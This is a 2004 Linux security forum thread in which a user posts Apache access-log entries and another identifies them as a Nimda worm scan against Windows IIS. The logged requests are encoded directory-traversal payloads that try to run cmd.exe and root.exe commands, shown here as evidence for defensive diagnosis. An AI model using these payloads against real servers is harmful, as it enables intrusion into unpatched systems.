LinuxQuestions.org
Latest LQ Deal: Latest LQ Deals
Home Forums Tutorials Articles Register
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices


Reply
  Search this Thread
Old 05-20-2004, 08:54 AM   #1
treedstang
Member
 
Registered: Jul 2003
Distribution: Suse 9.X Redhat 9.0, Enterprise 3 and 4 Fedora Mandrake
Posts: 79

Rep: Reputation: 15
Post Was I Hacked???


Hey guys and gals I'm trying to find out if the info below is a indicator that someone was trying or did hack into my Http apache server. Source IP address was replaced with a bogous address of "12.34.56.78"
Let me know what you think . I pulled this info from my access.log

Thanks

Tim

12.34.56.78 - - [17/May/2004:11:54:48 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
12.34.56.78 - - [17/May/2004:11:54:48 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
12.34.56.78 - - [17/May/2004:11:54:48 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
12.34.56.78 - - [17/May/2004:11:54:49 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
12.34.56.78 - - [17/May/2004:11:54:49 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
12.34.56.78 - - [17/May/2004:11:54:49 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
12.34.56.78 - - [17/May/2004:11:54:49 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
12.34.56.78 - - [17/May/2004:11:54:49 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
12.34.56.78 - - [17/May/2004:11:54:50 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
12.34.56.78 - - [17/May/2004:11:54:50 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
12.34.56.78 - - [17/May/2004:11:54:50 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
12.34.56.78 - - [17/May/2004:11:54:50 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
12.34.56.78 - - [17/May/2004:11:54:51 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 967 "-" "-"
12.34.56.78 - - [17/May/2004:11:54:51 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 967 "-" "-"
12.34.56.78 - - [17/May/2004:11:54:51 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
12.34.56.78 - - [17/May/2004:11:54:51 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
 
Old 05-20-2004, 09:00 AM   #2
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 69
It's a nimda scan. It exploits unpatched Microsoft Windows IIS webservers and the scans are harmless to systems running linux (despite being annoying). You can get more info on the nimda worm here:

http://www.cert.org/advisories/CA-2001-26.html
 
Old 05-20-2004, 09:41 AM   #3
treedstang
Member
 
Registered: Jul 2003
Distribution: Suse 9.X Redhat 9.0, Enterprise 3 and 4 Fedora Mandrake
Posts: 79

Original Poster
Rep: Reputation: 15
Capt_Caveman,

Thanks for the quick reply... I'm checking out the link now



Tim
 
  


Reply



Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
Have I been hacked? Please help linuxboy69 Linux - Security 11 09-07-2005 07:20 AM
Hacked? mikeshn Linux - Security 2 03-12-2004 01:57 PM
Help! Have I been hacked? Tenover Linux - Security 1 11-19-2003 03:24 PM
Did we just get hacked? vous Linux - Security 4 11-17-2003 08:11 AM
am i being hacked? tearinox Linux - Security 5 11-13-2003 06:00 PM

LinuxQuestions.org > Forums > Linux Forums > Linux - Security

All times are GMT -5. The time now is 09:04 PM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Open Source Consulting | Domain Registration